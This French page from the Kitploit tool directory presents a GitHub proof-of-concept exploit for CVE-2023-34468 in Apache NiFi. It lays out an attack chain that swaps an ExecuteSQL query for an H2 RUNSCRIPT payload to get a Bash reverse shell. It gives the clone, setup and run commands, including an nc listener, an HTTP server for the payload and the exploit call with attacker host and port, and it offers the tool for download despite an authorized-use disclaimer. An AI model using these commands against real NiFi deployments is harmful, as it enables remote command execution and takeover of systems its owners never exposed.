Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-34468 — CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC | Kitploit
Outils/GitHubGitHub/ozcanpng/cve-2023-34468
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubozcanpng/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-34468 — Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Petite preuve de concept en Python pour abuser d'un processeur ExecuteSQL Apache NiFi modifiable avec une charge utile H2 RUNSCRIPT afin de déclencher l'exécution de commandes à distance via un reverse shell Bash.

Uniquement pour les tests autorisés et la recherche. Ne pas utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.


Ce qu'il fait

root@kitploit:~
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
  1. Découvre automatiquement un seul processeur ExecuteSQL, ou accepte --processor-id manuellement.
  2. Écrit une charge utile locale rce.sql qui définit et appelle un alias d'exécution de shell basé sur Java.
  3. Vous invite à démarrer votre propre écouteur nc et serveur HTTP.
  4. Met à jour la requête du processeur pour récupérer rce.sql via H2 RUNSCRIPT.
  5. Démarre le processeur pour déclencher le reverse shell.
  6. Restaure la configuration originale du processeur après que vous ayez confirmé que le shell est arrivé.

Captures d'écran

1. Configuration

Configuration

2. Requête vers la charge utile

Exécution de l'exploit

3. Shell reçu

Mise à jour du processeur

4. Résultat

Résultat


Configuration

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Utilisation

Terminal 1 :

root@kitploit:~
rlwrap nc -lvnp 4444

Terminal 2, depuis le répertoire de ce dépôt :

root@kitploit:~
python3 -m http.server 8000

Terminal 3 :

root@kitploit:~
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444

Pour la sélection manuelle du processeur :

root@kitploit:~
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444

Affecté

ProduitVersion affectéeAccès requisImpact
Apache NiFiDéploiements affectés par CVE-2023-34468 utilisant le comportement modifiable ExecuteSQL/H2Capacité d'atteindre et de modifier le processeur NiFi cible via l'APIExécution de commandes à distance

Remarques

  • Le script suppose que l'API NiFi est accessible et que l'utilisateur/session actuel peut modifier le processeur cible.
  • Le fichier rce.sql généré est ignoré par git et doit être servi depuis le répertoire du dépôt avec python3 -m http.server.
  • Si la découverte automatique ne trouve aucun processeur ou plusieurs candidats, passez l'UUID du processeur manuellement avec --processor-id.
  • Le script tente de restaurer la configuration originale du processeur ExecuteSQL après que vous ayez confirmé que le shell est arrivé.

Références

  • NVD — CVE-2023-34468
  • Apache NiFi
  • Commandes de la base de données H2

Auteur

ozcanpng — github.com/ozcanpng — ozcanpng.dev

Télécharger l’outil